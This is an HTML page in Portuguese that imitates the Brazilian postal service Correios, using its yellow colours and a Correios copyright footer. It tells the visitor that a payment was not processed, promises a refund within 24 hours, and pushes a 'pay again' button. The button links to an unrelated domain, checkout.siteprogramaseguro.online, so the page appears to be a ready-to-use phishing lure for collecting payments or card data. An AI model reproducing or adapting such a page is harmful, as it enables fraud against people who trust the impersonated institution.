<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Aviso de Pagamento Não Processado</title>
    <style>
        * {
            box-sizing: border-box; /* Inclui padding e bordas na largura total */
        }
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f4f4f4;
            display: flex;
            flex-direction: column;
            justify-content: space-between;
            height: 100vh;
            overflow-x: hidden; /* Impede o overflow horizontal */
        }
        .container {
            text-align: center;
            background-color: #fff;
            padding: 40px;
            border-radius: 8px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
            max-width: 400px;
            width: 90%; /* Define uma largura máxima com uma porcentagem */
            margin: auto;
        }
        .container h1 {
            color: #ff0000; /* Cor vermelha para destacar o erro */
            margin-bottom: 20px;
        }
        .container p {
            font-size: 16px;
            color: #333;
            margin-bottom: 20px;
        }
        .retry-button {
            display: inline-block;
            background-color: #ffcc00; /* Cor amarela dos Correios */
            color: black;
            padding: 12px 24px;
            text-decoration: none;
            font-weight: bold;
            border-radius: 5px;
            transition: background-color 0.3s ease;
        }
        .retry-button:hover {
            background-color: #e6b800;
        }
        footer {
            text-align: center;
            padding: 10px 0;
            background-color: #FFCC08;
            color: black;
            font-size: 12px;
            width: 100%;
            position: fixed;
            bottom: 0;
        }
        .error-icon {
            font-size: 80px;
            color: #ff0000; /* Cor vermelha para o ícone de erro */
            margin-bottom: 20px;
        }
    </style>
</head>
<body>

    <div class="container">
        <div class="error-icon">⚠️</div>
        <h1>Pagamento Não Processado</h1>
        <p>Infelizmente, o seu pagamento não foi processado com sucesso. Por favor, tente realizar o pagamento novamente.</p>
        <p>Se o valor já foi debitado, ele será automaticamente devolvido à sua conta em até 24h.</p>
        <a href="https://checkout.siteprogramaseguro.online/VCCL1O8SBENE" class="retry-button">Tentar pagar novamente</a>
    </div>

    <footer>
        © 2024 Correios. Todos os direitos reservados.
    </footer>
</body>
</html>
